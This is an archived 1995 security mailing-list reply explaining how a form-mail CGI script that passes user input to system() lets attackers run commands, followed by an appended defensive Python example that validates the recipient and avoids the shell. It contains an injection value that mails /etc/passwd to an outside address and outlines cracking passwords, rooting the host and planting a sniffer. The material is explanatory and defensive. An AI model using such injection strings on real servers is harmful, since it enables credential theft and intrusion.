[323] in WWW Security List Archive
Re: GE Break-in: via HTTPD?
daemon@ATHENA.MIT.EDU (Paul Phillips)
Mon Jan 16 22:37:31 1995
Date: Mon, 16 Jan 1995 12:47:01 -0800 (PST)
From: Paul Phillips <psphilli@sdcc8.UCSD.EDU>
To: www-security@ns2.rutgers.edu
In-Reply-To: <9501161214.AA12258@atlas.br.RohmHaas.Com>
Reply-To: www-security@ns2.rutgers.edu
On Mon, 16 Jan 1995, Mr. Tom Cozzolino wrote:
> How is it possible? More importantly, how do we prevent
> this from happening again?
I have found several servers -- including NCSA's at one point -- that ran
CGI scripts that trusted user input too much. This can be used to
execute arbitrary commands on the server machine, under the UID the
server runs as. While this is usually "nobody", this still allows for
lots of damage.
Consider a form mail script that takes a user supplied variable and
passes it to mail like so:
system("/usr/ucb/mail -s $to_whoever");
I figure out that this is what it's doing, and make my own form that
passes to $to_whoever "foo;mail psp@ucsd.edu </etc/passwd".
Since system invokes a shell, the ; is interpreted as a command delimiter
and it happily mails me the password file. I run crack, find a few dozen
accounts to choose from (since they weren't running shadow passwords
they're probably not running npasswd either) and log in. Then I use one
of a zillion possible holes to crack root, drop in a sniffer, pick off the
rest of the network, have some more fun...
That's just one example. There are others. How do we prevent this from
happening again? Don't run a server unless you know what you're doing.
Don't allow just anyone to execute server side scripts. It's going to
happen again though, since both of these pieces of advice are violated
regularly. Do everything you can to secure your server machine -- pretend
the entire cracker population already has shells on it. They may.
--
Paul Phillips EMAIL: psp@ucsd.edu PHONE: (619) 220-0850
WWW: http://www.primus.com/staff/paulp/ FAX: (619) 220-0873
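A defender's illustration of the point Paul makes about system() and untrusted form fields, added here as an example and not part of the original post or of any real form mail script: the recipient is checked against a strict allowlist (an assumed policy) and mail is invoked as an argument vector rather than through a shell, so a `;` in the field is data, not a command separator.

```python
import re
import subprocess

# Constructed allowlist for the recipient field: exactly one plain mailbox, with a
# local part that cannot begin with "-" so it can never be read by mail as an option.
RECIPIENT_RE = re.compile(r"[A-Za-z0-9_][A-Za-z0-9._+-]{0,63}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def validate_recipient(to_whoever):
    """Accept only a single well-formed address; anything else is refused outright."""
    if not RECIPIENT_RE.fullmatch(to_whoever):
        raise ValueError("recipient field rejected: %r" % to_whoever)
    return to_whoever


def build_mail_argv(to_whoever, subject):
    """Argument vector for mail. Each element reaches mail as one argv entry, so
    ';', '<' or '|' inside a field are ordinary characters, not shell syntax."""
    return ["/usr/ucb/mail", "-s", subject, validate_recipient(to_whoever)]


def send_form_mail(to_whoever, subject, body, runner=subprocess.run):
    """Hardened counterpart of system("/usr/ucb/mail -s $to_whoever"): no shell is
    involved, the recipient is validated first, and the body goes in on stdin.
    `runner` is injectable (assumed hook) so the logic can be exercised without a
    real mail binary."""
    argv = build_mail_argv(to_whoever, subject)
    return runner(argv, input=body.encode(), check=True)


if __name__ == "__main__":
    # Constructed sample inputs: a legitimate recipient and the field value the post describes.
    for field in ("psp@ucsd.edu", "foo;mail psp@ucsd.edu </etc/passwd"):
        try:
            print("accepted:", build_mail_argv(field, "form submission"))
        except ValueError as err:
            print("rejected:", err)
```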